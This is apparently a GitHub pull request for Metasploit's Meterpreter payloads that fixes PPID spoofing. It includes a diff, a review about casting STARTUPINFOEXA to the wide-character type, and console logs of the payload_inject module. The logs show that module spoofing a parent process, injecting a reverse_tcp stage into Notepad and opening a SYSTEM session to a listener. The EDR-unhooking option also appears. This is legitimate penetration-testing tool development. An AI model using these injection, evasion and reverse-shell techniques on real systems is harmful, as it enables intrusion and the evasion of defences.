Fix PPID spoofing #660
Conversation
Tested the code and the changes look good. I just left the one comment.
@@ -382,11 +388,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet) | |||
} | |||
} | |||
|
|||
// Try to execute the process with duplicated token | |||
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi)) | |||
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, (LPSTARTUPINFOW)&si, &pi)) |
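Review bot: the (LPSTARTUPINFOW)&si cast added to the CreateProcessAsUserW call only silences the compiler; it does not convert the structure. The removed line passed &si directly, and if si is still declared as the ANSI STARTUPINFOEXA (as the review comment on this hunk notes), the W function will read the same bytes but treat string members such as lpDesktop and lpTitle as UTF-16, and the extended-attribute wrapper must match too or the call fails with "The parameter is incorrect". Declare si as STARTUPINFOEXW with cb set to sizeof(STARTUPINFOEXW) and use the W variants consistently, which is what the linked patch does, rather than casting at the call site.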
The cast here of si to LPSTARTUPINFOW is concerning. Up to this point si was STARTUPINFOEXA using multi-byte strings and not wide strings. Should si be completely switched to STARTUPINFOEXW? If that's the case, you could apply this patch I tested that will switch it to always using the W variant. https://github.com/smcintyre-r7/metasploit-payloads/commit/abd29ba1d709cb5aab08c55704614f38d5788c62.patch
Yeah that is concerning. I've applied and tested that patch - looks good. Thanks.
Changes look good to me. I tested them again with the new patch and everything checks out. I'll have this landed in a moment. Thanks for fixing this!
Before / Unpatched
msf6 exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 7568 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION -1 yes The session to run this module on
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running module against DC
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The parameter is incorrect.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/payload_inject) >
After / Patched
[*] Using exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set PPID 3592
PPID => 3592
msf6 exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3592 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION yes The session to run this module on
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running module against DC
[*] Spawned Notepad process 1664
[*] Spoofing PPID 3592
[*] Injecting payload into 1664
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1664
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:61873) at 2023-06-20 13:07:45 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/test/cmd_exec
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should return the result of echo
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[*] Passed: 4; Failed: 0; Skipped: 0
meterpreter > run post/test/file
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 16; Failed: 0; Skipped: 0
meterpreter > run post/test/meterpreter
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
meterpreter >
Includes changes from: * rapid7/metasploit-payloads#662 * rapid7/metasploit-payloads#660
This PR fixes rapid7/metasploit-framework#18113.
The commit be44377 introduced the issue by removing the structures required for PPID spoofing. I reverted that commit, which fixed the issue. I added back in what I believe to be the intent of that commit: better memory management for the commandLine_w variable.